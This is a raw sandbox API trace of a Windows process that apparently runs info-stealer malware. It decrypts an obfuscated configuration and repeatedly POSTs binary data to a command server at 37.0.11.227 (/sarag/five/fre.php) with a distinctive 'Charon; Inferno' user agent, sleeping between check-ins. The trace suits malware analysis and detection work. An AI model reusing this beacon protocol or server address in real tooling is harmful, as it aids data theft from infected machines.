(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.021] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.021] GetProcessHeap () returned 0x690000 [0197.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0197.021] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.029] GetProcessHeap () returned 0x690000 [0197.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0197.030] GetProcessHeap () returned 0x690000 [0197.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0197.030] GetProcessHeap () returned 0x690000 [0197.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0197.030] GetProcessHeap () returned 0x690000 [0197.030] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0197.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.032] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.038] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0197.043] GetProcessHeap () returned 0x690000 [0197.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0197.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.044] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.047] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.048] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.048] GetProcessHeap () returned 0x690000 [0197.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0197.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.050] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0197.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.051] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.052] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0197.052] GetProcessHeap () returned 0x690000 [0197.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0197.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.053] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0197.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.054] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0197.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.055] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0197.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.056] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0197.056] GetProcessHeap () returned 0x690000 [0197.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0197.056] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9af0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8f8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0197.058] GetProcessHeap () returned 0x690000 [0197.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0197.058] socket (af=2, type=1, protocol=6) returned 0x3f8 [0197.058] connect (s=0x3f8, name=0x6ae8f8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0197.082] FreeAddrInfoW (pAddrInfo=0x6a9af0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8f8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0197.082] GetProcessHeap () returned 0x690000 [0197.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0197.083] GetProcessHeap () returned 0x690000 [0197.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0197.083] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.084] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.084] GetProcessHeap () returned 0x690000 [0197.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0197.084] GetProcessHeap () returned 0x690000 [0197.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.085] GetProcessHeap () returned 0x690000 [0197.085] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0197.085] GetProcessHeap () returned 0x690000 [0197.085] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0197.085] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.086] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.086] GetProcessHeap () returned 0x690000 [0197.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0197.086] GetProcessHeap () returned 0x690000 [0197.087] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.087] send (s=0x3f8, buf=0x6abd08*, len=242, flags=0) returned 242 [0197.087] send (s=0x3f8, buf=0x6aba40*, len=159, flags=0) returned 159 [0197.087] GetProcessHeap () returned 0x690000 [0197.087] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0197.088] recv (in: s=0x3f8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0197.157] GetProcessHeap () returned 0x690000 [0197.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0197.158] GetProcessHeap () returned 0x690000 [0197.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0197.158] GetProcessHeap () returned 0x690000 [0197.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0197.159] GetProcessHeap () returned 0x690000 [0197.159] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0197.159] closesocket (s=0x3f8) returned 0 [0197.159] GetProcessHeap () returned 0x690000 [0197.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0197.160] GetProcessHeap () returned 0x690000 [0197.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0197.160] GetProcessHeap () returned 0x690000 [0197.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0197.160] GetProcessHeap () returned 0x690000 [0197.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0197.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11ec) returned 0x3f8 [0197.162] Sleep (dwMilliseconds=0xea60) [0197.164] GetProcessHeap () returned 0x690000 [0197.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0197.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.165] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.170] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0197.176] GetProcessHeap () returned 0x690000 [0197.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0197.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.178] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0197.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.179] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.180] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.180] GetProcessHeap () returned 0x690000 [0197.180] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0197.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.181] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0197.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.182] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0197.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.183] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0197.183] GetProcessHeap () returned 0x690000 [0197.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0197.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.184] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.185] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.186] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.186] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.186] GetProcessHeap () returned 0x690000 [0197.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0197.187] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.187] GetProcessHeap () returned 0x690000 [0197.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0197.187] GetProcessHeap () returned 0x690000 [0197.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0197.190] GetProcessHeap () returned 0x690000 [0197.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0197.191] GetProcessHeap () returned 0x690000 [0197.191] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0197.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.192] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.197] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0197.206] GetProcessHeap () returned 0x690000 [0197.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0197.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.208] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.209] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.210] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.210] GetProcessHeap () returned 0x690000 [0197.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0197.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.212] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0197.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.213] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.214] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0197.214] GetProcessHeap () returned 0x690000 [0197.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0197.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.215] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0197.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.216] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0197.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.217] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0197.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.218] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0197.218] GetProcessHeap () returned 0x690000 [0197.218] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0197.219] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adec8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0197.219] GetProcessHeap () returned 0x690000 [0197.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0197.219] socket (af=2, type=1, protocol=6) returned 0x3fc [0197.219] connect (s=0x3fc, name=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0197.245] FreeAddrInfoW (pAddrInfo=0x6adec8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0197.245] GetProcessHeap () returned 0x690000 [0197.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0197.245] GetProcessHeap () returned 0x690000 [0197.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0197.246] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.247] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.247] GetProcessHeap () returned 0x690000 [0197.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0197.247] GetProcessHeap () returned 0x690000 [0197.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.248] GetProcessHeap () returned 0x690000 [0197.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0197.248] GetProcessHeap () returned 0x690000 [0197.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0197.249] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.249] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.249] GetProcessHeap () returned 0x690000 [0197.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0197.249] GetProcessHeap () returned 0x690000 [0197.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.250] send (s=0x3fc, buf=0x6a91a8*, len=242, flags=0) returned 242 [0197.251] send (s=0x3fc, buf=0x6aba40*, len=159, flags=0) returned 159 [0197.251] GetProcessHeap () returned 0x690000 [0197.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0197.251] recv (in: s=0x3fc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0197.329] GetProcessHeap () returned 0x690000 [0197.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0197.330] GetProcessHeap () returned 0x690000 [0197.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0197.331] GetProcessHeap () returned 0x690000 [0197.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0197.331] GetProcessHeap () returned 0x690000 [0197.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0197.332] closesocket (s=0x3fc) returned 0 [0197.332] GetProcessHeap () returned 0x690000 [0197.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0197.332] GetProcessHeap () returned 0x690000 [0197.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0197.333] GetProcessHeap () returned 0x690000 [0197.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0197.334] GetProcessHeap () returned 0x690000 [0197.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0197.335] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11f0) returned 0x3fc [0197.339] Sleep (dwMilliseconds=0xea60) [0197.340] GetProcessHeap () returned 0x690000 [0197.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0197.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.341] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0197.354] GetProcessHeap () returned 0x690000 [0197.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0197.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.355] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.357] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.358] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.358] GetProcessHeap () returned 0x690000 [0197.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0197.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.359] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0197.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.360] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.361] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0197.361] GetProcessHeap () returned 0x690000 [0197.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0197.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.365] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.366] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.367] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.368] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.368] GetProcessHeap () returned 0x690000 [0197.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0197.368] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.368] GetProcessHeap () returned 0x690000 [0197.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) 